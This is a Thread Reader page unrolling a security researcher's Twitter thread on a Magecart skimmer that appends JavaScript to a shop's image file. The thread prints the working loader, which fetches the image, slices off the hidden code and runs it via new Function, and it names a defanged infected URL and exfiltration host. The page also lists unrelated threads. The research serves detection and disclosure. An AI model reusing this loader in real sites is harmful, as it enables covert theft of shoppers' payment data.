Profile picture
, 6 tweets, 2 min read
My Authors
Read all threads
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}

3/5
If you grab the resonseText without the slice vs if you grab it with the slice:

4/5
And here is the gist with the full skimmer code. Exfil to hxxps://googletag-manager[.]com/GTM-P75S36/

gist.github.com/krautface/dab3…

5/5
For the curious, the tool that found enabled us to find this: github.com/target/strelka
Missing some Tweet in this thread? You can try to force a refresh.

Enjoying this thread?

Keep Current with Affable Kraut

Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Related hashtags

#magecart

More from @AffableKraut see all

Profile picture
Affable Kraut
@AffableKraut
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Read 17 tweets
Profile picture
Affable Kraut
@AffableKraut
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x
Read 37 tweets
Profile picture
Affable Kraut
@AffableKraut
A week or so ago I broke down one #magecart loader, which was pretending to be Google Analytics -

Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
So here's the code we'll be looking at as you would see it on an infected website: gist.github.com/krautface/e0f8…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
Lines 3-14 in the prettified version look like they're doing something. If you look at Line 47 you can see the arguments passed into this anonymous function: window, document, 'script', 'dataLayer', 'GTM-WYRDH'. Lines 10-14 actually create a legit script tag, it's just never used
Read 10 tweets

Related threads

Profile picture
Andy Johnston
@TinyMusicCritic
Tomorrow, I'm commencing my rundown of the 25 artists (solo or group) who defined the past decade for me. This will be a personal list, not an estimation of zeitgeist-capturing, cultural impact. Every day, I'll post a few words & a sampler playlist of the artist's 2010-19 output Image
DAY 1. Despite the previous decade arguably representing their peak, experimental pop-noise provocateurs, XIU XIU, still released an impressive body of work that vacillated wildly between their poppiest & most out-there material, to thrilling effect.

open.spotify.com/playlist/5tw7g… Image
From the Nintendo DS-assisted 'Dear God, I Hate Myself' to this year's extremely challenging 'Girl with Basket of Fruit', via their full length reinterpretation of the Twin Peaks soundtrack & two of their best & most accessible LPs, 'Always' & 'Forget', Jamie Stewart & co...
Read 240 tweets
Profile picture
Gary Holland 🇺🇸 ⭐️⭐️⭐️ 🇺🇸
@gholland04
!!DECODE (07/03/19 7:33 PM EST)

DECODE 07/03/2019 — Sara Carter Tweets

Time to Buckle Down, Listen Up and Stand Ready to Fight for Our Way of Life and Traditions

Have a Happy, Fun, and Safe Independence Day

#Qanon
@realDonaldTrump

...
1.
Sara Carter Tweets

Here we find …

TimeStamp 2:00, 4:00
Time Delta 2h 0m
Caps Gematria Values: 618, 772
Keywords:
5
Activities
Forth of July
Traditions

...
2.
The Caps Gematria Value 618
Leads us to Q-Drop 618

Here we find …

Title:
19 Good Reporters at Risk

>>175260
Is [19] a marker for FBI?

...
Read 488 tweets
Profile picture
Inky
@inkysparks
Hank, the grumpy shepherd living in a cottage in the mountains in self-imposed exile, tending to his many, many sheep and his very large dog.
Connor, the vagabond that twists his ankle traipsing carelessly through his fields during a rainstorm.
The storm is not at its peak yet. The sheep are huddled a little closer, some of them seeking the shelter of trees and shrubbery, but the worst clouds are still far away. Hank sees a brief flash, then thunder rolls what feels like half a minute later.
Read 500 tweets
Profile picture
Mona
@Monaheart1229
New reporting on the Trump Inaugural Comm investigation, as of a couple of hrs ago, "According to ProPublica, the committee potentially paid a far-above-market rate for event space at the Trump International Hotel." #FridayFeeling
thedailybeast.com/report-new-evi…
From ProPublica: "The Trump inaugural appears to have overpaid for space at Trump’s Washington hotel, a possible violation of the law. Federal prosecutors are probing the festivities."
propublica.org/article/trump-…
Here's a story that ProPublica broke in Devember about Ivanka's involvement in the TIC financial web..
propublica.org/article/trump-…
Read 3 tweets
Profile picture
Joseph Stalin
@StalinIsBack
1/8 My favorite #quote by #JosephStalin, which explains the scientific, #DialecticalMaterialist explanation of true freedom in material reality, not just as an abstract ideal. #StalinIsBack #StalinLives #JVStalin #Stalin #StalinQuote #StalinQuotes #Truth #MELS #MarxismLeninism
2/8 Having an #objective, #rational, #ScientificSocialist, #Dialectical, & #Materialist viewpoint allows us to accurately see & evaluate & analyze #Truth & #Reality as they truly materially exist in this universe.
3/8 An idealistic, dogmatic viewpoint, which capitalists have, however, makes one irrational enough to 'see' freedom where freedom stays trapped on a piece of paper while people are oppressed in their actual lived lives.
Read 586 tweets
Profile picture
🐳🌌
@flyfarahway
yoonjin time travel au

On his 55th birthday, Kim Seokjin, also known in his neighborhood as “insufferable old Kim”, makes a wish to feel genuine happiness. The next day he wakes up 22 years old again and on the day he first meets his ex-boyfriend, Min Yoongi.

#YJweek18 #day1
to anyone who might read, qt only & don't reply so thread doesn't break cuz this is a looong au and my first uwu
there is some swearing just a heads up and this is angst w a happy ending so im sorry in advance
also this is lowkey inspired by Miss Granny (ph ver). haven’t watched the film but there’s a song on the OST that just FITS and i cry

here's the song:
Read 721 tweets

Trending hashtags

#PrintAndBeyond #Algiers #WorkingClass #Gibraltar #USA #Derna #DefundPBS #MayordeBlasio #BoycottHorseracing #Guayaquil #NeverNRA #Lottery #military #ScientificSocialist #MarianneWilliamson #USSR #USWarCrimes #Indian #WeakPelosi #Norway #print #stop #CCCP #MarxismAndTheNationalAndColonialQuestion #UN
Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!